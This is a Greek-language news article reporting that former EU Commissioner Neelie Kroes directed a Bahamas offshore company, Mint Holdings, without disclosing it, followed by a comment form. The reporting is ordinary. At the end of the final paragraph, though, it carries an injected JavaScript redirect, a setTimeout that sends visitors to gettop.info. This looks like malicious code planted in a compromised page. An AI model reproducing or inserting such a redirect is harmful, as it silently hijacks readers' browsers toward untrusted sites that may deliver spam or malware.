Πρώην Επίτροπος εμπλέκεται με off shore στις Μπαχάμες

0
9

 

Συνέχεια δίνεται στο σκάνδαλο των Panama Papers καθώς τώρα εμπλέκεται το όνομα της Ολλανδής πρώην Επιτρόπου Νίλι Κρους, η οποία σύμφωνα με δημοσίευμα της Suddeutsche Zeitung, διηύθυνε την εξωχώρια εταιρεία Mint Holdings Limited το 2000 με 2009.

Στη νέα λίστα αποκαλύψεων περιλαμβάνονται και πολλοί άλλοι πολιτικοί.

Σύμφωνα με το δημοσίευμα της γερμανικής εφημερίδας, μεταξύ 1990 και 2016, ιδρύθηκαν 175.888 off shore και ιδρύματα στις Μπαχάμες.

Η ύπαρξη τέτοιων εταιρειών δεν απαγορεύεται, εφόσον δεν χρησιμοποιούνται όμως για φοροδιαφυγή, ξέπλυμα μαύρου χρήματος ή δεν παραβιάζεται το καθήκον γνωστοποίησης, όπως στην περίπτωση της Ολλανδής Επιτρόπου. Ωστόσο, η Νίλι Κρους κατηγορείται ότι παραβίασε τον κώδικα δεοντολογίας της ΕΕ, καθώς υπήρξε διευθύντρια της συγκεκριμένης εταιρείας, σε περίοδο που ήταν Επίτροπος (2004-2010) και δεν το γνωστοποίησε, κάτι το οποίο απαγορεύεται σε μέλη της.

Η Κρους θα έπρεπε να είχε ενημερώσει για τη δραστηριότητά της ακόμη και μετά την παραίτησή της από τη διευθυντική της θέση. Η ίδια σε δηλώσεις της στη SZ έκανε λόγο για «αβλεψία».

Όπως δήλωσε ο δικηγόρος της, η κυρία Κρους αναλαμβάνει «πλήρως την ευθύνη» και προτίθεται να ενημερώσει σχετικά τον πρόεδρο της ΕΕ Ζαν Κλοντ Γιούνκερ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here